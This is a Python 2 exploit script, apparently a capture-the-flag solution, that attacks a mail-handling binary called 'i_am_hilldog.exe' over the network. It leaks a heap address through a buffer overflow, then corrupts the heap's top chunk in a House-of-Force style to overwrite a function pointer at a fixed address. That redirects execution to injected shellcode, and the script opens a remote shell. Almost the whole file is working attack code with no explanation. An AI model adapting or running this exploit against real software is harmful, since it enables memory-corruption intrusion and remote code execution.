import sys
import phun

class R(phun.Remote):

    def cmd(self,x):
        self.read('?\n')
        self.write(str(x)+ '\n')

    def die(self):
        self.cmd(8)

    def __email(self,n,a,b='aaaa\n'):
        self.cmd(n)
        self.read('> ')
        self.write(b)
        if self.read(1) == "\n":
            self.read('\n\n')
        self.read('\n')
        self.write(a)
        self.read('\n')
        
    def new_mail(self,data):
        self.__email(1,str(data) + "\n")

    def fill_mail(self,data):
        self.__email(2,data)
        
    def add_mail(self,data,s=None):
        s = s or len(data)
        self.new_mail(s)
        self.fill_mail(data)
        self.cmd(3)
        
    def edit(self,idx,data):
        self.cmd(4)
        self.read('?\n')
        self.write(str(idx)+"\n")
        self.read('?: ')
        self.write('n\n')
        self.write(data)
        self.read('\n\n')
        
#r= R('localhost',1234)
r= R('192.168.200.173',1234)
#r= R('iamhilldog.pwn.democrat', 9000)
r.read('$')
r.write('./i_am_hilldog.exe\n')

## first leak heap address
r.cmd(6)
r.read(": ")
r.write('a'*0xc7 + '|')
r.cmd(7)
x=r.read("\n")
heap = phun.u64(x[:-1].split('|',1)[1][:8])
if not heap:
    print '[-] no heap'
    r.die()
    sys.exit(1)
top = heap + 0x20 + 104
mybuf = heap + 0x20
print '[+] heap:',hex(heap)
print '[+] top:', hex(top)

## ok lets roll
r.add_mail('dupa\n',s=100)
sh = phun.sh('x64').ljust(104-8,"\xcc")
r.edit(0,phun.p64(mybuf+8) + sh  + '\xff'*8 + "\n")
r.new_mail(0x603110 - top - 2*8)
r.new_mail(100)
r.fill_mail(phun.p64(mybuf) + "\n") 
r.die()
r.read("\n");
print '[+] have some shellz'

r.shell()
# print r.read("\n")

# import telnetlib
# t = telnetlib.Telnet()
# t.sock = r.sock
# t.interact()
#raw_input('x')